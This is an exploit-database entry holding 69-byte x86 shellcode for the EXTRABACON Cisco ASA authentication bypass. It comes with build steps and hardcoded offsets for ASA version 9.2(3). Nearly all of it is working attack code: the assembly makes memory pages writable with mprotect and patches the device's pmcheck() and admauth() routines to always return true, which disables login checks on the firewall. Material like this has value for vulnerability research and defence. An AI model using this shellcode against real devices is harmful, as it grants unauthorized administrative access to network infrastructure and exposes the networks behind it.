Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)

EDB-ID:

40387

CVE:

N/A




Platform:

Hardware

Date:

2016-09-16


;
; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
;
; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
; License: http://opensource.org/licenses/MIT
; Release Date: September 15, 2016
;
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
;
; Description:
;            This is not the same shellcode as the Equation Group version,
;            but accomplishes the same task of disabling the auth functions
;            in less stages/bytes. Particularly, it is 69 bytes in one stage
;            instead of 200+ bytes spread across 2 stages.
;
; Build/Run:
;            1) $ nasm shelldisable.nasm
;            2) copy resulting shellcode into preamble_byte/preamble_snmp vars
;            3) Change launcher_snmp to 6 nops (or remove entirely)
;
; Note: The offsets given are for 9.2(3), not part of the original release
;
BITS 32

SAFERET_OFFSET  equ     0x9277386       ; where to continue execution
PMCHECK_BOUNDS  equ     0x9b78000       ; mprotect for pmcheck()
PMCHECK_OFFSET  equ     0x9b78010       ; location of pmcheck()
ADMAUTH_BOUNDS  equ     0x8085000       ; page align for admauth()
ADMAUTH_OFFSET  equ     0x8085a40       ; location of admauth()

; we must patch pmcheck() and admauth() to always return true
; xor eax, eax  = 31 c0
; inc eax       = 40
; ret           = c3

PATCH_CODE	equ	0xc340c031               ; gotta love endianess

; we need to fix the function frame to continue normal operation
; eax = 0x0
; esi = 0x0
; edi = 0x0b
; ebx = 0x10
; ebp = [esp - 0x4 (ret)] + 0x??
FIX_EBP         equ     0x48            ; this is 0x58, etc. in some versions
FIX_EDI         equ     0x0f0f0f0b      ; seems static?
FIX_EBX         equ     0x10            ; seems static?

_start:

    ; these are registers we have to clean up, so we can null them before save
    xor eax, eax
    xor ebx, ebx
    xor esi, esi
    xor ecx, ecx                        ; ecx is volatile register

    pusha                               ; save all registers

    add ch, 0x10                        ; ecx = 0x1000
    add dl, 0x7                         ; edx = 0x7
    add al, 0x7d                        ; eax = 0x7d

    push eax                            ; save eax for second call

    mov ebx, PMCHECK_BOUNDS             ; ebx = byte boundary for mprotect

    int 0x80                            ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)

    pop eax                             ; eax = 0x7d
    mov ebx, ADMAUTH_BOUNDS             ; second function page align

    int 0x80                            ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)

    push PATCH_CODE
    pop eax

    mov dword [PMCHECK_OFFSET], eax     ; write patch code to both functions
    mov dword [ADMAUTH_OFFSET], eax

    popa                                ; restore all registers

    push SAFERET_OFFSET                 ; push the safe return address

    ; these registers are pre-xored
    add bl, FIX_EBX
    mov edi, FIX_EDI

    mov ebp, esp
    add ebp, FIX_EBP

    ret                                 ; return to safe address